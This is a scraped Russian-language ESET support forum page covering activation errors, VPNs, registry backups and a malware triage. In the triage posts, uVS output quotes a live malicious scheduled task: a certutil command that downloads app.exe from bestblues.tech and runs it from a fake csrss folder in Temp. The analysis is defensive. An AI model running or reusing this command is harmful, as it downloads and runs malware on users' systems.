Уважаемые пользователи!

Поставщик ИТ-решений PRO32 сообщает вам, что после 17 лет сотрудничества мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новый антивирус от компании PRO32.

Продукты PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств на Windows / Android.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Выбрать дату в календареВыбрать дату в календаре

[ Закрыто] Проблемы с активацией, главная
DMITRY NOCHKIN


act.8
Цитата
Введено неверное имя пользователя/пароль для доступа к ESET License Manager.

Цитата
ACT.33 - 34 Ошибка активации.
Ошибка ​​связана с ситуацией, когда лицензия приобретена в одной стране, а используется в другой.
или
Например Китайскую лицензию нельзя активировать на немецкой версии программы. ( программа определяет, что выбранный вами язык не соответствует )
Ошибки ACT.33 или ACT.34 это однотипные ошибки - код зависит от языковой версии.
В случае если вы работаете с _файлом лицензии
Код активации ACT.33-34 отображается, когда лицензия активируется в продукте с языком, отличным от того, который содержится в файле лицензии.
Некоторые лицензии имеют языковую блокировку (в зависимости от страны, в которой они были приобретены) в рамках программы предотвращения утечки лицензий.
Таким образом, активация будет успешной после выбора соответствующего языка  установки.
Если проблему ACT 33 не удаётся решить - попробуйте установить 8 ( 7 > 6 > 5 ) версию антивируса ( отличается способ активации ) Но вы сможете это сделать только в случае если антивирус поддерживает вашу версию Windows.
Изменено: RP55 RP55 - 01.02.2021 16:12:48
Работодатели начали оформлять сотрудников как самозанятых.
[QUOTE]tangarin tangarin написал:
мне спеть?[/QUOTE]

Учитывая, как был написан вопрос все подозрения снимаются.
Защита от фишинга и VPN
NOD64

Цитата
Browsec VPN зашифровывает трафик и позволяет разблокировать запрещённые сайты.

Расширение позволяет обходить ограничения, установленные системным администратором, например, посещать Facebook, Вконтакте или Одноклассники в случае их блокировки в корпоративной сети.

Browsec работает по технологии VPN: зашифровывает абсолютно весь трафик и перенаправляет его через защищенную облачную сеть. Таким образом, никто не сможет идентифицировать вас, отследить активность или проанализировать трафик.

Антивирус не может проверить зашифрованный трафик.
Думаю если на пробу взять VPN без шифрования защита от фишинга будет работать.
Работодатели начали оформлять сотрудников как самозанятых.
tangarin tangarin

A вы Moжeтe Дoкaзaть, чтo Bы нe pобoт ?
ESET не на системный диск, Как это будет работать?
[QUOTE]Подозрительный Человек написал:
Еще вот интересно, а если я заюзаю реестр, который чистый (сразу после установки винды экспортировал), то тогда и настройки все будут как были в том реестре? И ни паролей каких=либо, ключей и прочего? И заработает ли этот реестр вообще или программы, ныне установленные[/QUOTE]

Нужно читать о реестре и смотреть какие там данные хранятся. :)
Да, настройки будут как в реестре. ( Но не все программы хранят информацию в реестре )

Реестр если был правильно сохранён т.е. к нему был полноценный доступ и при копировании не было ошибок - будет работать.
Система может не запуститься, если было кардинально изменено железо ( другая материнская плата и т.д ), или слетит активация.
ESET не на системный диск, Как это будет работать?
Хотя...
Посмотрел флешка от Samsung на 64 Г от 1 350р
ESET не на системный диск, Как это будет работать?
[QUOTE]Подозрительный Человек написал:
И я так понимаю, если это вырубить, то и в бекапе сохранится, как вырубленое.[/QUOTE]

Если речь о настройках\параметрах системы - то сохраниться.

[QUOTE]Подозрительный Человек написал:
Хотя по сути... взять остатки бабла... сходить в ДНС да купить флешку блин, гигов на 64.[/QUOTE]

С флешками нужно осторожно - есть медленные\медленные и с такой система будет восстанавливаться до пятого пришествия.
т.е. читать отзывы перед покупкой, искать в сети обзоры и тесты скорости, смотреть реальную ёмкость носителя, надёжность устройства, учитывать, что в ряде случаев нужно выравнивать таблицу разделов ( иначе и на хорошей\скоростной флешке скорость будет низкая  )  народ рекомендует от Samsung
Но... учитывая стоимость проще купить SSD от Samsung или intel на +- 120 Г.
Изменено: RP55 RP55 - 30.01.2021 12:51:35
Обнаружена атака путем подделки записей кэша ARP, Каждый день выходит это сообщение
Хорошо :)
uVS как стать опытными пользователем этой программы., Обучение пользования программой uVS
Вредоносный сайт\ресурс который антивирус ESET определяет, как: " Обнаружена атака путем подделки записей кэша ARP "
Как это выглядит в UVS.

[CODE]HTTPS://BESTBLUES.TECH/APP/APP.EXE
C:\USERS\RAMZES\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE[/CODE]

Программа показывает два объекта.
Первый это ссылка на исполняемый файл. ( что само по себе подозрительно :)
Второй путь до  директории: APPDATA с нелепой маскировкой под системный C:\Windows\System32\csrss.exe
и не менее "интеллектуальной"  маскировкой SCHEDULED.EXE   SCHEDULED[S].EXE [/S] планировщик...
------------
В развёрнутом виде это:

[CODE]Полное имя HTTPS://BESTBLUES.TECH/APP/APP.EXE
Имя файла                   HTTPS://BESTBLUES.TECH/APP/APP.EXE
Тек. статус                   ПОДОЗРИТЕЛЬНЫЙ
             
Сохраненная информация      на момент создания образа
Статус                      
                           
Доп. информация             на момент обновления списка
Файл                        C:\WINDOWS\SYSTEM32\CMD.EXE
                           
Ссылки на объект            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions                     "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\[/CODE]

+

[CODE]Полное имя C:\USERS\RAMZES\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE
Имя файла                   SCHEDULED.EXE
Тек. статус                  ПОДОЗРИТЕЛЬНЫЙ
                                                     
Сохраненная информация      на момент создания образа
Статус                      ПОДОЗРИТЕЛЬНЫЙ
Инф. о файле                Не удается найти указанный файл.
Цифр. подпись               проверка не производилась
                           
Статус                      ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Путь до файла               Типичен для вирусов и троянов
                           
Доп. информация             на момент обновления списка
Файл                        C:\WINDOWS\SYSTEM32\CMD.EXE
                           
Ссылки на объект            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions                     "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
Actions                     "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\[/CODE]

Подозрительные моменты: Temp; AppData; TaskCache; Csrss и т.д.
Из интересного задействован системный: C:\WINDOWS\SYSTEM32\CERTUTIL.EXE
*Certutil.exe — это программа командной строки, которая устанавливается как часть служб сертификации.
Проверка ссылки на V.T.: https://www.virustotal.com/gui/url/1940aabfdff63a8fe9d94861b32d35c59daf14b164622ddc­86511a0e4e00248a/detection
Изменено: RP55 RP55 - 30.01.2021 11:58:43
Обнаружена атака путем подделки записей кэша ARP, Каждый день выходит это сообщение
Цитата
Ramzi Sadigli написал:
Я так понял: во всем был виноват Ace Stream

В задачах была ссылка на сайт который запускал исполняемый файл.
https://www.virustotal.com/gui/url/1940aabfdff63a8fe9d94861b32d35c59daf14b164622ddc­86511a0e4e00248a/detection

Код
Полное имя      HTTPS://BESTBLUES.TECH/APP/APP.EXE
Имя файла                   HTTPS://BESTBLUES.TECH/APP/APP.EXE
Тек. статус                  ПОДОЗРИТЕЛЬНЫЙ                     
                            
Сохраненная информация      на момент создания образа
Статус                      
                            
Доп. информация             на момент обновления списка
Файл                        C:\WINDOWS\SYSTEM32\CMD.EXE
                            
Ссылки на объект            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions                     "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}


+

Код
Полное имя                  C:\USERS\RAMZES\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE
Имя файла                   SCHEDULED.EXE
Тек. статус                  ПОДОЗРИТЕЛЬНЫЙ 
                            
                           
Сохраненная информация      на момент создания образа
Статус                      ПОДОЗРИТЕЛЬНЫЙ 
Инф. о файле                Не удается найти указанный файл. 
Цифр. подпись               проверка не производилась
                            
Статус                      ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Путь до файла               Типичен для вирусов и троянов
                            
Доп. информация             на момент обновления списка
Файл                        C:\WINDOWS\SYSTEM32\CMD.EXE
                            
Ссылки на объект            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions                     "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
Actions                     "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\
Изменено: RP55 RP55 - 30.01.2021 11:16:43